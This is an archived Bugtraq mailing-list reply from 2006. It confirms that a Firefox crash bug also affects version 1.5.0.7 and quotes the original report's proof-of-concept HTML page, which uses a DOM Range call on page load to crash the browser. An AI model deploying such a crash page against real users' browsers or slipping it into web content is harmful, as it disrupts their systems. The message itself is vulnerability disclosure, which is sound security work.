[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <1162321514.5015.32.camel@8104>
Date: Tue, 31 Oct 2006 19:05:14 +0000
From: Gouki <Gouki@...kiHQ.org>
To: xxxx@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
Firefox 1.5.0.7 is also vulnerable (to DoS at least).
On Tue, 2006-10-31 at 09:24 +0000, xxxx@...il.com wrote:
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html>
> <head>
> <script type="text/javascript">
> function do_crash()
> {
> var range;
>
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
> </script>
> </head>
> <body onload="do_crash()">
> <p>Good bye Firefox!</p>
> </body>
> </html>
Download attachment "signature.asc" of type "application/pgp-signature" (192 bytes)
Powered by blists - more mailing lists